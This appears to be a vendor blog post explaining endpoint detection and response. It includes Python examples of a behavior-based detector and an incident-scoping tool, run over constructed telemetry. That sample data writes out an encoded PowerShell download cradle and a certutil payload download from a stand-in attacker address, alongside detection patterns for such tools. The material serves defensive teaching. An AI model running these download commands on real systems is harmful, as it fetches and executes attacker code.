Endpoint protection platforms (EPPs) are a foundational element of modern cybersecurity. These integrated suites use anti-malware engines to detect and block known malicious code on the devices that connect to the organization’s network. While they stop the bulk of commodity threats, they cannot on their own protect endpoints from the more sophisticated, targeted attacks that increasingly hit businesses.
The concept of endpoint detection and response (EDR) has arisen to address these advanced threats. EDR not only detects stealthy malware and threat actors, but it also provides insight into how they got into the network, what they’re doing in it, and how to stop and remove them.
[Related Reading: MDR vs. EDR]
Why you need EDR
Organizations are challenged with defending an ever-expanding attack surface. The term “attack surface” refers to all the ways an attacker can get into an organization’s network and compromise sensitive data. Over the last decade or so, the attack surface has gotten bigger as the number of devices that connect to company networks has grown. Laptops and mobile devices — both company-issued and employees’ personal devices — routers and Wi-Fi access points, POS systems, and IoT devices are all now potential entry points into the corporate network. According to the SANS Endpoint Protection and Response Survey, 44 percent of IT teams manage between 5,000 and 500,000 endpoints.
The sheer number of devices virtually guarantees that some percentage of them will harbor OS and application vulnerabilities at any given time. While antimalware protection has evolved to the point where it catches the vast majority of malicious files, it can’t stop everything. Fileless malware, for example, never writes a payload to disk: it runs in memory, often by abusing tools that are already on the system such as PowerShell or WMI, so a scanner that compares files against signatures has nothing to match.
A weaker link than the devices themselves, though, is the people who use them. Humans are the target of social engineering attacks, which trick users into opening phishing emails and clicking malicious links by posing as a credible source such as a bank or a software vendor’s update notice. Studies have repeatedly shown that human error is the primary driver of data breaches.
Humans are also a critical component of Advanced Persistent Threats (APTs). These sophisticated attacks unfold over the long term, often months, in multiple stages, and they usually gain their initial foothold through people: an employee tricked by a phishing email, stolen or reused credentials, or, less commonly, a deliberate insider. APTs are designed to extract the maximum amount of data possible while evading detection for as long as possible. A Ponemon Institute survey found it can take more than three months for a company to detect an APT once it’s inside the network.
To combat these threats, organizations need to have visibility into system activities and events that take place on the endpoints and be able to take appropriate action quickly. EDR solutions can monitor your endpoints for these and other modern threats that older antimalware products can’t detect.
How EDR Works
EDR can be thought of as a more intelligent antimalware. To better illustrate this, consider your home as the endpoint. Traditional antimalware could be likened to the lock on your front door. That lock would be sufficient to prevent entry by almost anyone who didn’t have a key. But no lock is foolproof. An intruder could still find a way in by picking the lock, kicking the door in, or convincing someone in your household to open the door by posing as a credible visitor such as a delivery person.
Adding additional security measures in the form of motion detectors and security cameras would be similar to adopting EDR. Motion detectors and cameras would provide greater visibility into your home, allowing you to monitor all points of entry including your windows, garage, and back door. They would alert you to any attempt to gain entry into your home, and even if an intruder succeeded, you would have the means to detect and identify the person. You’d also typically have the ability to review recorded footage of the event to determine exactly how the individual got in, what they did or took while in your home, and how to prevent similar events from happening in the future.
EDR provides similar capabilities for your endpoint devices. The vast majority of malicious threats will be detected and blocked from getting into the endpoint at all. For the attacks that manage to slip through, EDR monitors and logs all activity so you have total visibility and a complete record of what has occurred on the endpoint. This enables you to quickly identify security incidents and determine the remediation steps necessary to contain or remove the threat.
The components of EDR
Former Gartner analyst Anton Chuvakin initially classified the evolving endpoint protection tools and methods. In 2013, he coined a generic term for tools focused on detecting and investigating suspicious activities and other malicious issues on endpoints: Endpoint Threat Detection and Response (ETDR). In 2015, Gartner officially changed the reference to simply Endpoint Detection and Response, or EDR.
According to Gartner, there are four elements that must exist for something to be considered an EDR solution:
- Detect security incidents
- Contain the incident at the endpoint
- Investigate security incidents
- Provide remediation guidance
An effective EDR solution will contain all these components. Let’s look at each more closely.
EDR solutions install a lightweight software agent on each endpoint. The agent continuously records what happens on the device: process starts and their command lines, parent-child relationships between processes, file and registry changes, network connections, and logons. That telemetry is streamed to a central platform, where it is matched against detection rules and threat intelligence and compared with baselines of normal behavior, often with the help of machine learning. Processes or user behaviors that deviate from normal are surfaced as alerts so analysts can investigate them.
Because EDR relies on behavior analysis rather than on signatures alone, it can catch threats that slip past traditional tools, including zero-day exploits, fileless malware, multi-stage attacks, and insider threats. A word processor that spawns a PowerShell session with an encoded command is suspicious whatever the document’s hash.
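To make that distinction concrete, here is a small behavior-based detector, added as an example for this article (it is not Alert Logic’s code and not any product’s rule set), run over constructed process-creation telemetry. The event layout, the host name WS-0147, the user names and the 198.51.100.23 address are assumptions. None of the three rules looks at a file hash: they key on who launched whom, on what an encoded PowerShell command decodes to, and on built-in tools being used to fetch content, and they escalate when several fire on the same process tree.

```python
"""Behavior-based detection over EDR process-creation telemetry.

Added example, not Alert Logic's code. Event fields (ts, host, user, pid,
ppid, image, parent_image, cmdline) are an assumption modelled on what an
EDR agent or Sysmon event ID 1 records for each process start."""
import base64
import binascii
import ntpath
import re

WINWORD = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
PWSH = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"


def _b64_ps(script):
    """PowerShell's -EncodedCommand takes base64 of UTF-16LE text."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def _ev(ts, user, pid, ppid, parent_image, image, cmdline):
    return {"ts": ts, "host": "WS-0147", "user": user, "pid": pid, "ppid": ppid,
            "parent_image": parent_image, "image": image, "cmdline": cmdline}


# Constructed telemetry from one workstation. 198.51.100.23 is a documentation
# (TEST-NET-2) address standing in for the attacker's server.
SAMPLE_EVENTS = [
    _ev("2024-05-01T09:12:01Z", "jdoe", 4120, 3988, r"C:\Windows\explorer.exe", WINWORD,
        r'"WINWORD.EXE" /n "C:\Users\jdoe\Downloads\invoice.docm"'),
    _ev("2024-05-01T09:12:07Z", "jdoe", 4312, 4120, WINWORD, PWSH, "powershell.exe -nop -w hidden -enc "
        + _b64_ps("IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/a')")),
    _ev("2024-05-01T09:12:09Z", "jdoe", 4400, 4312, PWSH, r"C:\Windows\System32\certutil.exe",
        r"certutil.exe -urlcache -split -f http://198.51.100.23/b.dat C:\Users\jdoe\AppData\Local\Temp\b.dat"),
    # Benign: an administrator runs a maintenance script from a console window.
    _ev("2024-05-01T09:20:00Z", "admin.ops", 5010, 5001, r"C:\Windows\System32\cmd.exe", PWSH,
        r"powershell.exe -ExecutionPolicy AllSigned -File C:\Ops\rotate-logs.ps1"),
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# PowerShell accepts any unambiguous prefix of -EncodedCommand (-e, -ec, -enc, ...).
ENC_ARG = re.compile(r"(?i)(?:^|\s)-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]{16,})")
DOWNLOAD_CRADLE = re.compile(r"(?i)downloadstring|downloadfile|invoke-webrequest|net\.webclient|\biex\b")
# Living-off-the-land binaries that fetch a payload without dropping a recognizable file.
LOLBIN_DOWNLOAD = {"certutil.exe": re.compile(r"(?i)-urlcache\b"),
                   "bitsadmin.exe": re.compile(r"(?i)/transfer\b")}


def _base(path):
    return ntpath.basename(path).lower()


def rule_office_spawns_script_host(ev):
    # Word or Excel has no legitimate reason to launch a shell or script interpreter.
    if _base(ev["parent_image"]) in OFFICE_APPS and _base(ev["image"]) in SCRIPT_HOSTS:
        return f"{_base(ev['parent_image'])} spawned {_base(ev['image'])}"
    return None


def decode_encoded_command(cmdline):
    """Plaintext of a -EncodedCommand argument, or None if absent or malformed."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le", errors="replace")
    except binascii.Error:
        return None


def rule_encoded_powershell(ev):
    # Encoding hides intent from a plain command-line match; decode it and inspect the content.
    if _base(ev["image"]) not in {"powershell.exe", "pwsh.exe"}:
        return None
    decoded = decode_encoded_command(ev["cmdline"])
    if decoded is None:
        return None
    tag = "download cradle" if DOWNLOAD_CRADLE.search(decoded) else "encoded command"
    return f"{tag}: {decoded.strip()}"


def rule_lolbin_download(ev):
    pat = LOLBIN_DOWNLOAD.get(_base(ev["image"]))
    return f"{_base(ev['image'])} fetched remote content" if pat and pat.search(ev["cmdline"]) else None


RULES = [rule_office_spawns_script_host, rule_encoded_powershell, rule_lolbin_download]


def detect(events):
    """Run every rule over every event; escalate when one process tree trips
    more than one rule, which marks a multi-stage chain rather than a one-off."""
    alerts = [{"rule": r.__name__, "pid": ev["pid"], "ts": ev["ts"], "detail": d, "severity": "medium"}
              for ev in events for r in RULES if (d := r(ev))]
    parent = {ev["pid"]: ev["ppid"] for ev in events}

    def root(pid):  # climb to the oldest ancestor present in this batch
        while parent.get(pid) in parent:
            pid = parent[pid]
        return pid

    chains = {}
    for a in alerts:
        chains.setdefault(root(a["pid"]), []).append(a)
    for chain in chains.values():
        if len({a["rule"] for a in chain}) > 1:
            for a in chain:
                a["severity"] = "high"
    return alerts
```

Running `detect(SAMPLE_EVENTS)` yields three alerts, all on the Word-to-PowerShell-to-certutil chain and all escalated to high, while the administrator’s signed script, which is also PowerShell, produces nothing. Real products carry hundreds of such rules plus statistical baselines; the point is that every one of these three would fire on a brand-new payload that no signature has ever seen.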
Endpoint detection is only as good as the threat intelligence that informs it. Threat intelligence continuously gathers raw data on emerging or existing threats and threat actors and contextualizes it to ensure constant visibility into attack techniques, trends, and vulnerabilities. EDR detection will not be effective without relevant threat intelligence.
Once a threat has been identified, the EDR solution must contain it so it cannot move laterally within the network. This is usually an automated response: killing the offending process, blocking its network connections, or isolating the host so it can talk only to the EDR console. Containment is especially critical with threats that spread from one device to the next, which can move across the environment in minutes.
With the threat detected and contained, it’s examined to collect contextual information. This enables the security team to understand exactly what is happening and why. A user account accessing data on the weekend could indicate an insider threat or could just be an employee putting in extra hours to meet a looming project deadline.
If the event turns out to be a legitimate threat, investigating will help determine why it happened. Did the threat sneak through the endpoint because of an application vulnerability? Is it a new threat not documented in the threat intelligence? Does the endpoint’s OS need to be updated? Investigating the reason for the breach is essential to identifying security blind spots and preventing the same type of threat from occurring again and again.
Effective EDR solutions will be able to automatically act on confirmed threats. Responses to a threat can include anything from shutting down the processes on the infected endpoint to isolating the endpoint from the rest of the company network to removing the infection.
Remediation goes beyond neutralizing the compromised endpoint, though. Your IT team will have to determine what data, if any, was stolen and which other parts of the network were involved and need remediation. An EDR solution should support this by providing the visibility to determine where the malicious activity originated, what data and applications it interacted with, and the other details of the threat timeline, so you have a complete record of the event. Ultimately, remediation should help you strengthen your overall network security.
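As an added illustration of that scoping step (example code written for this article, not Alert Logic’s), the following rebuilds the timeline of one incident from constructed process, network and file telemetry and turns it into remediation tasks. The record layout, the pids, the paths and the TEST-NET addresses are all assumptions; the key design choice is that the investigation starts from the alerted process but scopes the whole process tree, since the alert usually fires on a child stage rather than on the process that got in first.

```python
"""Scope one incident from mixed endpoint telemetry and turn it into remediation tasks.

Added example, not Alert Logic's code. The record layout is an assumption:
every event has ts, type and pid; "process" events add ppid/image/user,
"netconn" events add dst/dport, "file" events add op/path."""
from collections import defaultdict

# Constructed telemetry from one host. 198.51.100.23 and 203.0.113.5 are
# documentation addresses (TEST-NET-2/3), not real destinations.
EVENTS = [
    {"ts": "2024-05-01T09:12:01Z", "type": "process", "pid": 4120, "ppid": 3988, "image": "WINWORD.EXE", "user": "jdoe"},
    {"ts": "2024-05-01T09:12:07Z", "type": "process", "pid": 4312, "ppid": 4120, "image": "powershell.exe", "user": "jdoe"},
    {"ts": "2024-05-01T09:12:08Z", "type": "netconn", "pid": 4312, "dst": "198.51.100.23", "dport": 80},
    {"ts": "2024-05-01T09:12:09Z", "type": "process", "pid": 4400, "ppid": 4312, "image": "certutil.exe", "user": "jdoe"},
    {"ts": "2024-05-01T09:12:10Z", "type": "file", "pid": 4400, "op": "write", "path": r"C:\Users\jdoe\AppData\Local\Temp\b.dat"},
    {"ts": "2024-05-01T09:12:15Z", "type": "process", "pid": 4480, "ppid": 4312, "image": "rundll32.exe", "user": "jdoe"},
    {"ts": "2024-05-01T09:13:02Z", "type": "file", "pid": 4480, "op": "read", "path": r"\\FS01\Finance\Q1-forecast.xlsx"},
    {"ts": "2024-05-01T09:13:40Z", "type": "netconn", "pid": 4480, "dst": "198.51.100.23", "dport": 443},
    # Unrelated activity on the same host during the same minutes.
    {"ts": "2024-05-01T09:12:30Z", "type": "process", "pid": 5010, "ppid": 5001, "image": "Teams.exe", "user": "jdoe"},
    {"ts": "2024-05-01T09:12:31Z", "type": "netconn", "pid": 5010, "dst": "203.0.113.5", "dport": 443},
]


def process_tree(events, alert_pid):
    """Climb from the alerted process to its oldest recorded ancestor, then
    collect that root and every descendant. Returns (root_pid, set_of_pids)."""
    procs = {e["pid"]: e for e in events if e["type"] == "process"}
    if alert_pid not in procs:
        raise ValueError(f"no process-creation record for pid {alert_pid}")
    children = defaultdict(list)
    for p in procs.values():
        children[p["ppid"]].append(p["pid"])
    root = alert_pid
    while procs[root]["ppid"] in procs:
        root = procs[root]["ppid"]
    tree, stack = set(), [root]
    while stack:
        pid = stack.pop()
        if pid not in tree:
            tree.add(pid)
            stack.extend(children[pid])
    return root, tree


def scope_incident(events, alert_pid):
    """Ordered timeline of everything the process tree did, plus what it touched."""
    root, pids = process_tree(events, alert_pid)
    inc = {"root_pid": root, "pids": pids, "timeline": [], "files": [], "destinations": set()}
    for e in sorted((e for e in events if e["pid"] in pids), key=lambda e: e["ts"]):
        if e["type"] == "process":
            line = f"{e['ts']} proc pid={e['pid']} ppid={e['ppid']} {e['image']} user={e['user']}"
        elif e["type"] == "netconn":
            line = f"{e['ts']} net  pid={e['pid']} -> {e['dst']}:{e['dport']}"
            inc["destinations"].add(e["dst"])
        else:
            line = f"{e['ts']} file pid={e['pid']} {e['op']} {e['path']}"
            inc["files"].append((e["op"], e["path"]))
        inc["timeline"].append(line)
    return inc


def remediation_plan(inc):
    """Concrete follow-ups: kill the whole tree (not just the alerted process),
    quarantine what it wrote, block where it talked to, review what it read."""
    return {
        "kill": sorted(inc["pids"]),
        "quarantine": [p for op, p in inc["files"] if op == "write"],
        "block": sorted(inc["destinations"]),
        "review_access": [p for op, p in inc["files"] if op == "read"],
    }
```

Calling `scope_incident(EVENTS, 4400)` on the certutil alert walks up to the Word process that opened the document, pulls in the sibling rundll32 stage that the alert itself never mentioned, and produces an eight-line timeline that excludes the Teams traffic running at the same time. The plan it yields answers the questions above directly: the finance spreadsheet that was read is the candidate for the "what data was stolen" question, and the single external address is what to block and hunt for across the rest of the fleet.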
EDR is essential protection
No organization can be completely immune to attacks in today’s aggressive threat environment. Cybersecurity must instead focus on rapid detection and response to reduce the likelihood and mitigate the damage of a successful attack. An EDR solution, ideally paired with an EPP, provides the strongest defense against exploits on your endpoint devices, allowing you to proactively find and stop attacks before they compromise your network.
Alert Logic Endpoint Security
With Alert Logic’s extended endpoint protection, organizations can monitor and isolate endpoint attacks at the earliest opportunity before any damage is done. Our managed detection and response platform can work alongside any existing antivirus tools to provide an additional layer of defense.